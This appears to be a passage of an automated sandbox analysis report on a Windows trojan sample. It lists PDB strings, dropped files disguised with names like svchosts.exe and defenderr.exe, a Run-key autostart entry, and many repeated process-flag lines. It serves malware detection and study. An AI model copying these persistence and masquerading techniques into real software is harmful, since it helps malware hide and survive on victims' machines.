Source:	Binary string: System.Core.ni.pdb source: WER9246.tmp.dmp.6.dr, WER43E3.tmp.dmp.14.dr
Source:	Binary string: Microsoft.VisualBasic.pdb source: WER9246.tmp.dmp.6.dr, WER43E3.tmp.dmp.14.dr
Source:	Binary string: C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe, 0000000B.00000002.558054025.000000001F478000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: System.Windows.Forms.pdb source: WER9246.tmp.dmp.6.dr, WER43E3.tmp.dmp.14.dr
Source:	Binary string: mscorlib.pdb source: WER9246.tmp.dmp.6.dr, WER43E3.tmp.dmp.14.dr
Source:	Binary string: symbols\dll\mscorlib.pdbpdb0 source: HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe, 00000000.00000002.467426221.000000001F9F8000.00000004.00000010.00020000.00000000.sdmp, HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe, 0000000B.00000002.558054025.000000001F478000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: System.Configuration.pdb@ source: WER9246.tmp.dmp.6.dr
Source:	Binary string: System.Drawing.pdb source: WER9246.tmp.dmp.6.dr, WER43E3.tmp.dmp.14.dr
Source:	Binary string: System.Management.pdb source: WER9246.tmp.dmp.6.dr, WER43E3.tmp.dmp.14.dr
Source:	Binary string: mscorlib.ni.pdb source: WER9246.tmp.dmp.6.dr, WER43E3.tmp.dmp.14.dr
Source:	Binary string: System.Management.ni.pdb source: WER9246.tmp.dmp.6.dr, WER43E3.tmp.dmp.14.dr
Source:	Binary string: System.Core.pdb source: WER9246.tmp.dmp.6.dr, WER43E3.tmp.dmp.14.dr
Source:	Binary string: System.Runtime.Remoting.ni.pdbRSDSB source: WER9246.tmp.dmp.6.dr, WER43E3.tmp.dmp.14.dr
Source:	Binary string: System.Configuration.ni.pdbRSDSO* source: WER9246.tmp.dmp.6.dr, WER43E3.tmp.dmp.14.dr
Source:	Binary string: lib.pdb.0 source: HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe, 00000000.00000002.467426221.000000001F9F8000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: mscorlib.ni.pdbRSDS] source: WER9246.tmp.dmp.6.dr, WER43E3.tmp.dmp.14.dr
Source:	Binary string: mscorlib.pdbcorlib.pdbpdblib.pdbC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb`g source: HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe, 00000000.00000002.467426221.000000001F9F8000.00000004.00000010.00020000.00000000.sdmp, HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe, 0000000B.00000002.558054025.000000001F478000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: mscorlib.pdbM source: HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe, 00000000.00000002.454682511.000000001B4F0000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Xml.ni.pdbRSDS source: WER9246.tmp.dmp.6.dr, WER43E3.tmp.dmp.14.dr
Source:	Binary string: Microsoft.VisualBasic.ni.pdbRSDS source: WER9246.tmp.dmp.6.dr, WER43E3.tmp.dmp.14.dr
Source:	Binary string: System.Xml.pdb@ source: WER43E3.tmp.dmp.14.dr
Source:	Binary string: System.ni.pdb source: WER9246.tmp.dmp.6.dr, WER43E3.tmp.dmp.14.dr

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 1_2_00007FFBAC1A3DA8 pushad ; ret		1_2_00007FFBAC1A3DC1
Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	Code function: 11_2_00007FFBAC185965 pushfd ; retf		11_2_00007FFBAC185991

Source: initial sample	Static PE information: section name: .text entropy: 7.869095226720743
Source: initial sample	Static PE information: section name: .text entropy: 7.869095226720743

Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe

File created: C:\ProgramData\Microsoft\MyClient\defenderr.exe

Jump to dropped file

Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	File created: C:\Users\user\Desktop\svchosts.exe			Jump to dropped file
Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	File created: C:\ProgramData\Microsoft\MyClient\defenderr.exe			Jump to dropped file

Boot Survival

Creates autostart registry keys with suspicious names

Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe

Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run e162b1333458a713bc6916cc8ac4110c

Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run e162b1333458a713bc6916cc8ac4110c	Jump to behavior
Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run e162b1333458a713bc6916cc8ac4110c	Jump to behavior
Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run e162b1333458a713bc6916cc8ac4110c	Jump to behavior
Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run e162b1333458a713bc6916cc8ac4110c	Jump to behavior
Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run e162b1333458a713bc6916cc8ac4110c	Jump to behavior
Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run e162b1333458a713bc6916cc8ac4110c	Jump to behavior
Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run e162b1333458a713bc6916cc8ac4110c
Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run e162b1333458a713bc6916cc8ac4110c

Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\HEUR-Trojan.Win32.Generic-4d178e10389731a660d.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\Microsoft\MyClient\defenderr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\Microsoft\MyClient\defenderr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\Microsoft\MyClient\defenderr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\Microsoft\MyClient\defenderr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\Microsoft\MyClient\defenderr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\Microsoft\MyClient\defenderr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\Microsoft\MyClient\defenderr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\Microsoft\MyClient\defenderr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\Microsoft\MyClient\defenderr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\Microsoft\MyClient\defenderr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\Microsoft\MyClient\defenderr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\Microsoft\MyClient\defenderr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\Microsoft\MyClient\defenderr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\Microsoft\MyClient\defenderr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\Microsoft\MyClient\defenderr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\Microsoft\MyClient\defenderr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\Microsoft\MyClient\defenderr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\Microsoft\MyClient\defenderr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\Microsoft\MyClient\defenderr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\Microsoft\MyClient\defenderr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\Microsoft\MyClient\defenderr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\Microsoft\MyClient\defenderr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\Microsoft\MyClient\defenderr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\Microsoft\MyClient\defenderr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\Microsoft\MyClient\defenderr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\Microsoft\MyClient\defenderr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\Microsoft\MyClient\defenderr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\Microsoft\MyClient\defenderr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\Microsoft\MyClient\defenderr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\Microsoft\MyClient\defenderr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\Microsoft\MyClient\defenderr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\Microsoft\MyClient\defenderr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\Microsoft\MyClient\defenderr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\Microsoft\MyClient\defenderr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\Microsoft\MyClient\defenderr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\ProgramData\Microsoft\MyClient\defenderr.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
